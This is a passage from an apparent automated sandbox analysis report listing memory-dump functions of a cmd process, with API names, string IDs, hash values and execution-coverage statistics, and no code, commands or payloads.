                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: a2d7bac548f64c6641c0da22163e8fcf6c740905a7ad725696579701c3137af0
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 4A91E532F58E5989FB63CF669C583AD2BA0F344BC9F446106DE8A93E85DB34C655C308
                                            Function 00000253FC4428F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000253FC4428DF), ref: 00000253FC442A12
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 53138b2b42f720ce6c4b665b935f06945f6ac081d87f3f870004bad33296a20d
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 47910432F58E5989FB72CF659C58BED3BA0B344BC9F642106DE0A63E85CA35C255C708
                                            Function 00000253FC438090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 88ac21b984cfa4f73fa00dece11244df0e6ebe258cea53976450c545b9cc8e37
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 7C111C36B54F088AEB00CB60EC583A933B4F759B99F441E21EE6D46BA4DF78C2648344
                                            Function 00000253FC4027E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 6116db9f1cb80eed9a6fe86945f945bdc5af3c2e675b0423470b5c759d9a7b4c
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 7D71B236AC8F8946E776DE269C483AA6B94F3847C6F412016DD4953FE8DE34C720CB08
                                            Function 00000253FC4327E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 7bc5c2f6e213fd082cc04122c64bc9dcc1d7ff6d62ec540fe2d0f72d652c8876
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 8871B232A48F8942E776EE269C483AA7794F7C47C6F912026DD4943F8ADE34C721D704
                                            Function 00000253FC3D80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: a867ecd61067bd974513b2e0b3a8687c98aeb5c4a6070218a9a60476511a4ea9
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BC513832B49E0C8ADB54CFA5D82CB2C3391F344BC9F015512EA4643B89D77CEA49C785
                                            Function 00000253FC3D9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 8fe93dd2867aaeac60564b531120a4154e86121c8c3833e7610bfa44f970d0c3
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: AE617B32908BCC81EB61DF55E85479AB7A0F785BC9F046216EB9807B99CF7CD294CB04
                                            Function 00000253FC4025DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 7aafcfeb97a13df2a1d29db7a773620e49131ece7260bfa33750bf0e48cba5be
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 5C510736EDCB8841E676DE2AA85C3AA6A50F3C47C2F541025CD4953FEADA35C620C748
                                            Function 00000253FC4325DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 8dc674b2e1178a8f16e2c398e19442a2f120b7444329b51c1f986649d1302385
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 68510336E8CB9841EA76DE25AC5C3AA7651F7C4BC2F942035CD5903F8ADB35C620E748
                                            Function 00000253FC412660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 8b2fafd8db1320373785039747b2ef8e9f4e0eb42ba47ef6f629bd3c053db9f4
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 9F411B32E29E8886E722CF66E8087DAB7A0F3887D5F441121EE8DC7B54EB38C511C744
                                            Function 00000253FC442660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: a297a9ddb3ff9bed3ba49065482fba82d7238f2620cf712497da271a366c1984
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 8F41EA32A29E8886E721CF65E8487D9B7A0F3887C5F905121EE4D87B54EF39C551C744
                                            Function 00000253FC409178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 9d26b0d6b36e5df8b713e7d2d15e17f33ad24ce9152f05eb050632e622155549
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 47115E32A58F8882EB22CB15F808249B7E5F788B85F585220DECD47B65DF3CC661CB04
                                            Function 00000253FC439178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 5b0f927342c36ea83fc4b063cd89e8d9ca4775a55f832c20d992d56636100a98
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: AB112E32A18F4482EB21CB15F848259B7E5F798B95F585221DE8D47B54DF3CC661CB04
                                            Function 00000253FC401D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: f8def0cd58daebaa280fe28bad968fa6e7422138d097087985aa9e6277bdd919
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 0511A131E85F8881EA16CB67A80829967A0FB88FD1F585024DE8E53B35DF38D552C304
                                            Function 00000253FC431D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 48867b2af8b99c003e5fb2a278964c12b14b3ae9567c3debe5477bda6e467a44
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: E811AD31E05F8881EE16CB66A80869967A0F7C9FC1FA8A024DE4E53B24EF38D552C704
                                            Function 00000253FC401264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 731cfb9599b7be72fe96a4e92123d8734eb1a9d96edae54012a8d43dc1160d03
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 7BE03931E81A089AE717CB63EC0838936E1EB88BA6F449024C99907760EF7D85A98740
                                            Function 00000253FC431264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 3090edef865a08366904e3f232e9320eb232d9bcd73f4ad79bd73adc314dd2cb
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 88E03931E41E08DAEB15CB62DC0878936E1EB88B86F549024CD1907750EF7D85A98750
                                            Function 00000253FC401000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: a7b734c4dc42ef385560b3ac6a3e24dfff4ab52c1aaa7a48dc46f8cf2d51b74e
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 47E01271E919089BE71BDF63DC0839976E1FB8CF66F449024C95907720EE3C85A9D714
                                            Function 00000253FC431000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 89bab23cae52dee1025f46425bc8922f726e28b48fd47880293458d76c4e8b04
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: A7E06D71E51D08DAEB19CB22DC0868832A1FB88B82F548020CD1907710EE3885A89610

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:1366
                                            Total number of Limit Nodes:2
